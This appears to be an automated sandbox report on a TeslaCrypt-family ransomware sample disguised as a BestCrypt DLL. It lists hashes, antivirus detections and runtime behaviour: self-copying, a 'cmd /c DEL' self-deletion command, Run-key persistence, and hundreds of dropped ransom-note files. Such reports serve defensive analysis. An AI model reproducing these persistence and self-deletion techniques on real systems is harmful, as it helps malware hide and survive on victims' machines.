Analysis Date2016-02-14 12:03:43
MD5e19d80a757580588957e947179d491d0
SHA16865462b25e93d485fabd70598714bccb13efd05

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 5e892d41754a7ecb60095a42615688cd sha1: 2eade28b0a6e93f288c4559f5242e38cc769737a size: 42496
Section.rdata md5: 67b40363cf6bc1034e622fde439ac3f1 sha1: 1b2445666f405e36b8712af514ef14ae8407689e size: 8704
Section.data md5: af82be876e36e9a8fa61c2b5cb9d0821 sha1: 1b0a4386fba8116e8c755f2a1b8fca572f26fb11 size: 19968
Section.rsrc md5: 5c42e7c955f7f13e157227eb0313f5e9 sha1: 598877dd6aa1ebb1cbc8ffc362ea595aaa08ce96 size: 189952
Timestamp2016-02-09 12:29:26
VersionLegalCopyright: Copyright © 1995-2011
InternalName: BestCrypt
FileVersion: 4.02.5
CompanyName: Jetico, Inc.
ProductName: BestCrypt SHELLEXT Dynamic Link Library
ProductVersion: 4.02.5
FileDescription: BestCrypt Shell Extension DLL
OriginalFilename: BCShExt.DLL
PackerMicrosoft Visual C++ ?.?
PEhash50519ecc352f482d63f6bcad1d0b389a5eba9c5d
IMPhashfc2a2932afa1f7ca2bd06365b610a4bc
AVCA (E-Trust Ino)Gen:Variant.Zusy.181392
AVRisingNo Virus
AVMcafeeRansomware-FDX!E19D80A75758
AVAvira (antivir)TR/Crypt.Xpack.445985
AVTwisterNo Virus
AVAd-AwareGen:Variant.Zusy.181392
AVAlwil (avast)Win32:Malware-gen
AVEset (nod32)Win32/Kryptik.ENIU
AVGrisoft (avg)Generic_r.HGF
AVSymantecNo Virus
AVFortinetW32/Kryptik.ENFX!tr
AVBitDefenderGen:Variant.Zusy.181392
AVK7Trojan ( 004dddb21 )
AVMicrosoft Security EssentialsRansom:Win32/Tescrypt.E
AVMicroWorld (escan)Gen:Variant.Zusy.181392
AVMalwareBytesRansom.TeslaCrypt
AVAuthentiumW32/Agent.XL.gen!Eldorado
AVEmsisoftGen:Variant.Zusy.181392
AVFrisk (f-prot)W32/Agent.XL.gen!Eldorado
AVIkarusTrojan.Win32.Crypt
AVZillya!Trojan.Bitman.Win32.957
AVKasperskyTrojan-Ransom.Win32.Bitman.ijh
AVTrend MicroNo Virus
AVVirusBlokAda (vba32)No Virus
AVCAT (quickheal)Ransom.Crowti.WR7
AVBullGuardGen:Variant.Zusy.181392
AVArcabit (arcavir)Gen:Variant.Zusy.181392
AVClamAVNo Virus
AVDr. WebTrojan.Encoder.3817
AVF-SecureGen:Variant.Zusy.181392

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\klmwofd.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c DEL C:\686546~1.EXE
Creates ProcessC:\Documents and Settings\Administrator\Application Data\klmwofd.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\686546~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\klmwofd.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\klmwofd.exe\\x00
RegistryHKEY_CURRENT_USER\Software\8E9F953E066506C\data ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\klmwofd.exe\\x00
RegistryHKEY_CURRENT_USER\Software\xxxsys\ID ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+yae.html
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_wfakteilk.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+yae.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+yae.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+yae.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+yae.png
